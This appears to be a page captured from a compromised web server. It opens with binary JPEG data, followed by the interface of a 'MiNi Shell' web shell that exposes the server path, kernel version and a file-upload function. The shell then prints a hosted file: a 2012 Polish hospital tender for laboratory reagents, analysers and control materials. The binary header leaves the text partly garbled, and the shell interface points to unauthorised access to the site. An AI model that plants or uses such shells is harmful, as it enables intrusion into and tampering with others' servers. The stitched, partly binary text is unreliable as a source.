JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120906/192567-N-2012.html

<p class="kh_header"><b>Ełk: Dostawa odczynników, testów oraz materiałów do diagnostyki laboratoryjnej. Numer sprawy: 31/2011-DZP/PNO</b><br>
<b>Numer ogłoszenia: 192567 - 2012; data zamieszczenia: 06.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników, testów oraz materiałów do diagnostyki laboratoryjnej. Numer sprawy: 31/2011-DZP/PNO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę wymienionych w niniejszej specyfikacji części zamówienia - zadania od 1 do 14. 

2. Każdy z wykonawców może złożyć ofertę na wybrane przez siebie zadanie lub zadania, jednak nie więcej niż dopuszczalna liczba zadań 



3. Opis przedmiotu zamówienia
A.	Przedmiotem zamówienia jest dostawa odczynników wraz z dzierżawą analizatorów zgodna 
z opisem przedmiotu zamówienia zawartym w formularzach cenowych stanowiących Załącznik Nr 2 do SIWZ zawierający 14 Zadań. 
B.	Dostarczenie przedmiotu zamówienia odbędzie się na koszt i ryzyko Wykonawcy do siedziby Zamawiającego. 
C.	Wykonanie umowy może odbywać się sukcesywnie, w ilości wynikającej z zamówień częściowych Zamawiającego. 

Kody Wspólnego Słownika Zamówień: 33696500-0	Odczynniki laboratoryjne


Zadanie Nr 1: 	Przedmiotem zamówienia jest  dostawa odczynników do diagnostyki chorób alergologicznych met. Western Blot. - wg Załącznika Nr 2.

Zadanie Nr 2: 	Przedmiotem zamówienia jest  dostawa probówek do diagnostyki parazytologicznej - wg Załącznika Nr 2.

Zadanie Nr 3: 	Przedmiotem zamówienia jest  dostawa odczynników do  analizatorów hematologicznych Micros 60 i Pentra 80 XL - wg Załącznika Nr 2.

Zadanie Nr 4: 	Przedmiotem zamówienia jest  dostawa odczynników do analizatora biochemicznego KONELAB 30 i kuwet jednorazowego użytku - wg Załącznika Nr 2.

Zadanie Nr 5: 	Przedmiotem zamówienia są odczynniki do analizatora parametrów krytycznych BAYER - Rapidlab 348. - wg Załącznika Nr 2.

Zadanie Nr 6: 	Przedmiotem zamówienia jest  dostawa pasków do analizy moczu wraz z dzierżawą analizatora - wg Załącznika Nr 2.

Zadanie Nr 7: 	Przedmiotem zamówienia jest  dostawa odczynników lateksowych i szybkich testów diagnostycznych oraz barwników hematologicznych i odczynników do analityki ogólnej - wg Załącznika Nr 2.

Zadanie Nr 8: 	Przedmiotem zamówienia są materiały pomocnicze do diagnostyki laboratoryjnej - wg Załącznika Nr 2.

Zadanie Nr 9: 	Przedmiotem zamówienia jest  dostawa próżniowego systemu pobierania krwi wraz z dzierżawą aparatu do automatycznego oznaczania OB - wg Załącznika Nr 2.

Zadanie Nr 10: 	Przedmiotem zamówienia jest dostawa odczynników do analizatora immunodiagnostycznego wraz z jego dzierżawą - wg Załącznika Nr 2.

Zadanie Nr 11: 	Przedmiotem zamówienia jest dostawa odczynników do analizatora koagulologicznego ACL 200 i ACL 7000 - wg Załącznika Nr 2.

Zadanie Nr 12: 	Przedmiotem zamówienia jest dostawa testów do identyfikacji i oznaczania lekowrażliwości metodą automatyczną na aparacie VITEK 2 oraz manualnej biochemicznej identyfikacji bakterii wraz z niezbędnymi odczynnikami - wg Załącznika Nr 2 


Zadanie Nr 13: 	Przedmiotem zamówienia jest  dostawa  materiałów do manualnej diagnostyki mikrobiologicznej dla potrzeb pracowni bakteriologicznej - wg Załącznika Nr 2.

Zadanie Nr 14: 	Przedmiotem zamówienia jest dostawa butelek do posiewów krwi i płynów ustrojowych z dzierżawą analizatora- wg Załącznika Nr 2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie.
 
Szczegółowy opis wymaganego doświadczenia dla wykonawców: Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej dwóch (2) dostaw przedmiotu zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie. Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż wykonał należycie minimum 2 dostawy przedmiotu zamówienia o wartości co najmniej 368 000,00 PLN - w sytuacji złożenia oferty częściowej obejmującej wybrane Zadania, Zamawiający określa wymaganą minimalną wartość brutto dostaw dla poszczególnych Zadań. W takiej sytuacji wartość wykazanych dostaw (każdej oddzielnie) musi odpowiadać wartością sumie wszystkich Zadań, na które Wykonawca składa ofertę. 

Zadanie Nr	Wartość dostaw
1	3 000,00
2	5 000,00
3	20 000,00
4	80 000,00
5	10 000,00
6	10 000,00
7	25 000,00
8	7 000,00
9	35 000,00
10	100 000,00
11	25 000,00
12	20 000,00
13	20 000,00
14	8 000,00
	368 000,00</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W zakresie wymagań w ofpowiednich fomularzach cenowych: 1Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.
2.Wymóg dostarczenia ulotek/instrukcji używania spełniających wymagania określone w ust. 13.6., w szczególności pkt 3 i 7 załącznika do ww. rozporządzenia - metodyki muszą zawierać powtarzalność, odtwarzalność, czułość analityczną, etc.
3. Oferent zobowiązany jest do załączenia na każdy oferowany odczynnik: deklaracji zgodności CE (art. 5.1 ustawy o wyrobach medycznych), kopii rejestracji wyrobu medycznego (art. 52 ustawy o wyrobach medycznych) bądź kopii powiadomienia Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych o wprowadzeniu wyrobu do obrotu (art. 105 ustawy).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wraz z ofertą zobowiązany jest złożyć dokumenty nie wymienione powyżej: 1) 	Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
2) 	Formularz cenowy 3) 	Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych 
4)	Wykaz wykonanych dostaw</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień w art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych:
1.	Zamawiający dopuszcza możliwość zmiany cen w zakresie ich obniżenia w trakcie trwania umowy. W przypadku obniżki cen towarów będących przedmiotem umowy, Wykonawca przyzna Zamawiającemu bieżący rabat cenowy dla pozycji objętych obniżką do wysokości nowej, obowiązującej ceny - wymagana forma aneksu. 
2.	wstrzymanie lub wycofanie z obrotu dostępnych na rynku serii,
3.	zaprzestanie lub wstrzymanie produkcji,
4.	pojawienie się na rynku ulepszonej formy odczynnika, 
5.	zmiana wielości opakowania nie powodująca zmiany ogólnej ilości (sztuk) odczynnika objętego przedmiotową umową oraz nie powodująca zmiany ceny,
6.	zmiana numeru katalogowego,
7.	Zamawiający w trakcie realizacji umowy może dokonać przesunięć ilościowych asortymentu, według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 10:00, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 - Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 15.10.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1: 	Przedmiotem zamówienia jest  dostawa odczynników do diagnostyki chorób alergologicznych met. Western Blot. - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Panel alergologiczny- pediatryczny 27 alergenów	op.	4								1. Metoda Euroline, na paskach testowych umożliwiająca wykonanie jednego testu dla pacjenta, w zestawie zawarte wszystkie niezbędne do wykonania odczynniki.
Niezbędny sprzęt i oprogramowanie do oznaczeń met. WB  i Euroline	kpl.	1								Bezpłatne użyczenie na okres trwania umowy
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.												
2	Wymóg dostarczenia ulotek/instrukcji używania spełniających wymagania określone w ust. 13.6., w szczególności pkt 3 i 7 załącznika do ww. rozporządzenia - metodyki muszą zawierać powtarzalność, odtwarzalność, czułość analityczną, etc.												
3	Pakiet stanowi niepodzielną całość i nie podlega podziałowi												
4	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.												
5	W kolumnie Numer kat.  Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2: 	Przedmiotem zamówienia jest  dostawa probówek do diagnostyki parazytologicznej - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Probówka do diagnostyki parazytologicznej	szt.	800							Probówki jednorazowego użytku, z podwójnym filtrem oraz filtrem tłuszczowym,wypełnione formaliną i tritonem,kompatybilne z wszystkimi typami wirówek z rotorami na 15 ml.                                                                    
Płyn Lugola 	op.	1							
Enzymatyczny płyn płuczący	op.	1							
Aparat do parazytologii, kompatybilny z probówkami	kpl.	1							Bezpłatne użyczenie na okres trwania umowy
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.											
2	Pakiet stanowi niepodzielną całość i nie podlega podziałowi											
3	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.											
4	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3: 	Przedmiotem zamówienia jest  dostawa odczynników do  analizatorów hematologicznych Micros 60 i Pentra 80 XL - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw odczynników do analizatora hematologicznego Micros 60, wykonanych w trybie 3-Diff	ozn.	14000									
Krew kontrolna do analizaotra 3- Diff Normal	ml	48									Materiały kontrolne z dostępem do programu opracowań statystycznych wyników kontrolnych zawierającym co najmniej: 
Krew kontrolna do analizaotra 3- Diff Low	ml	48									.          Analizę metody wraz z wyliczeniem SD, CV, TE, błędów znormalizowanych precyzji i dokładności oraz wykreśleniem karty OPS znormalizowanej 
Krew kontrolna do analizatora 3- Diff High	ml	48									        Analizę okresu roboczego z wykonaniem co najmniej krzywej Levey-Jenningsa i krzywej dokładności   Analizę porównawczą z innymi użytkownikami takich samych materiałów kontrolnych i wyliczenie błędu dokładności w stosunku do średniej grupowej
 Bezpośredni dostęp do opracowań przez internet, przeliczenia dostępne natychmiast po przesłaniu danych
 Analiza prowadzona na danych skumulowanych
 Wprowadzane jednostki analityczne tradycyjne zgodne z dotychczas stosowanymi w laboratorium (dowolny wybór)
Obsługa programu w języku polskim
Zestaw odczynników do analizatora hematologicznego 5- Diff/wyszczególnić/ w tym 60 % wykonanych w trybie 5-Diff 	ozn.	6000									
Krew kontrolna do analizaotra 5 Diff Normal	ml	48									Materiały kontrolne z dostępem do programu opracowań statystycznych wyników kontrolnych zawierającym co najmniej: 
Krew kontrolna do analizaotra 5 Diff Low	ml	48									.          Analizę metody wraz z wyliczeniem SD, CV, TE, błędów znormalizowanych precyzji i dokładności oraz wykreśleniem karty OPS znormalizowanej 
Krewkontrolna do analizatora 5 Diff High	ml	48									         Analizę okresu roboczego z wykonaniem co najmniej krzywej Levey-Jenningsa i krzywej dokładności   Analizę porównawczą z innymi użytkownikami takich samych materiałów kontrolnych i wyliczenie błędu dokładności w stosunku do średniej grupowej
 Bezpośredni dostęp do opracowań przez internet, przeliczenia dostępne natychmiast po przesłaniu danych
 Analiza prowadzona na danych skumulowanych
 Wprowadzane jednostki analityczne tradycyjne zgodne z dotychczas stosowanymi w laboratorium (dowolny wybór)
 Obsługa programu w języku polskim
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.													
2	Pakiet stanowi niepodzielną całość i nie podlega podziałowi													
3	Krew kontrolna tego samego producenta co odczynniki													
4	 Dostawca odczynników w okresie trwania umowy zapewnia bezpłatne koszty pracy autoryzowanego serwisu analizatorów , koszty dojazdu oraz materiały zużywalne do przeglądów okersowych.													
5	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.													
6	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4: 	Przedmiotem zamówienia jest  dostawa odczynników do analizatora biochemicznego KONELAB 30 i kuwet jednorazowego użytku - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ALBUMINA	ilość ozn.	900											Cena oznaczenia zawiera  koszty  kalibratorów niezbędnych do kalibracji testu.
ALKOHOL ETYLOWY	ilość ozn.	1800											
AMINOTRANSFERAZA ALANINOWA (ALT)	ilość ozn.	7000											
AMINOTRANSFERAZA ASPARAGINOWA (AST)	ilość ozn.	7000											
a - AMYLAZA	ilość ozn.	2400											
ANTYSTREPTOLIZYNA O	ilość ozn.	400											
BILIRUBINA CAŁOWITA	ilość ozn.	3000											
BIAŁKO CAŁKOWITE	ilość ozn.	900											
BIAŁKO W MOCZU I PMR	ilość ozn.	700											
BIAŁKO C-REAKTYWNE (CRP)	ilość ozn.	5500											
CHOLESTEROL	ilość ozn.	5000											
CHOLESTEROL HDL	ilość ozn.	2000											
DEHYDROGENAZA MLECZANOWA	ilość ozn.	340											
FOSFATAZA ALKALICZNA	ilość ozn.	350											
FOSFOR	ilość ozn.	500											
GAMMA GLUTAMYLOTRANSFERAZA	ilość ozn.	680											
GLUKOZA	ilość ozn.	12000											
KINAZA KREATYNOWA - CK	ilość ozn.	600											
KINAZA KREATYNOWA - MB (CK-MB)	ilość ozn.	100											
KREATYNINA met. Enzymatyczna	ilość ozn.	9000											
KWAS MOCZOWY	ilość ozn.	2500											
MOCZNIK/BUN UV	ilość ozn.	7000											
TRIGLICERYDY	ilość ozn.	5600											
WAPŃ ARSENAZO	ilość ozn.	800											
ŻELAZO	ilość ozn.	900											
MAGNEZ	ilość ozn.	180											
HEMOGLOBINA GLIKOLOWANA	ilość ozn.	200											
TIBC	ilość ozn.	100											
KONTROLA DO HbA1C POZIOM i	ml	5											
KONTROLA DO HbA1C POZIOM ii	ml	5											
SUROWICA KONTROLNA - POZIOM I	ml	200											Materiały kontrolne z dostępem do programu opracowań statystycznych wyników kontrolnych zawierającym co najmniej: 
        Analizę metody wraz z wyliczeniem SD, CV, TE, błędów znormalizowanych precyzji i dokładności oraz wykreśleniem karty OPS znormalizowanej 
        Analizę okresu roboczego z wykonaniem co najmniej krzywej Levey-Jenningsa i krzywej dokładności   Analizę porównawczą z innymi użytkownikami takich samych materiałów kontrolnych i wyliczenie błędu dokładności w stosunku do średniej grupowej
Bezpośredni dostęp do opracowań przez internet, przeliczenia dostępne natychmiast po przesłaniu danych
 Analiza prowadzona na danych skumulowanych
Wprowadzane jednostki analityczne tradycyjne zgodne z dotychczas stosowanymi w laboratorium (dowolny wybór)
Obsługa programu w języku polskim

SUROWICA KONTROLNA - POZIOM II	ml	200											
